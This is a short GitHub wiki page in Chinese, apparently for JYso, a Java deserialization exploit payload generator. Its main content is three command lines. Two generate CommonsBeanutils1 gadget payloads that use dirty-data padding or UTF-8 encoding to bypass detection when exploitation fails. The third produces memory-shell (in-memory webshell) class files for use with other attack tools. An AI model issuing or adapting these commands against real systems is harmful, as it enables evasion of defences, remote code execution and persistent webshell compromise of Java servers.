-
Notifications
You must be signed in to change notification settings - Fork 180
Home
炁 edited this page Apr 1, 2024
·
12 revisions
POC检测到反序列化,但是利用失败时,可以把Payload换成以下来试试Bypass:
- 脏数据
java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -dt 1 -dl 50000
- UTF-8编码强特征
java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -utf
生成内存马类文件,来配合别的工具利用。
java -jar JYso-[version].jar -y -g [Gadget] -p "[E-EX-MS-MemShellClass]" -gen